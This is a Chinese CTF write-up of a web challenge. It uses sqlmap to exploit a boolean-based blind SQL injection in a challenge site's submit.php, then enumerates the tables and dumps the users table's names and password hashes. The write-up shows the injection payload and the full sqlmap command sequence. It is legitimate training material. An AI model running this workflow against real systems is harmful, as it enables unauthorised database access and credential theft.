0x00 题目
有人提醒了H4x0r他的Web150新闻网站存在漏洞,所以H4x0r加固了网站。你现在需要找到网站管理用户的密码散列从而得到flag。
0x01 解题
这题和Web 150类似,只不过这题是基于布尔型的盲注,直接上sqlmap神器:
1
| python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --threads 10
|
返回结果:
1 2 3 4 5 6 7 8 9 10
| --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 3770=3770 AND 'wNSD'='wNSD --- ... web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: SQLite
|
获取表段:
1 2 3 4 5 6 7 8 9 10
| python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --dbms=SQLite --technique B --threads 10 --tables ... Database: SQLite_masterdb [2 tables] +-------+ | data | | users | +-------+
|
获取users表内容:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --dbms=SQLite --technique B --threads 10 -T users --columns ... Database: SQLite_masterdb Table: users [3 columns] +----------+---------+ | Column | Type | +----------+---------+ | id | INTEGER | | name | TEXT | | password | TEXT | +----------+---------+
|
获取name,password字段内容,得到flag:
1 2 3 4 5 6 7 8 9 10 11 12 13
| python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --dbms=SQLite --technique B --threads 10 -T users -C name,password --dump ... Database: SQLite_masterdb Table: users [2 entries] +----+-------+-----------------------------------------------+ | id | name | password | +----+-------+-----------------------------------------------+ | 1 | john | 1f3870be274f6c49b3e31a0c6728957f (apple) | | 2 | admin | 1d5920f4b44b27a802bd77c4f0536f5a (google.com) | +----+-------+-----------------------------------------------+
|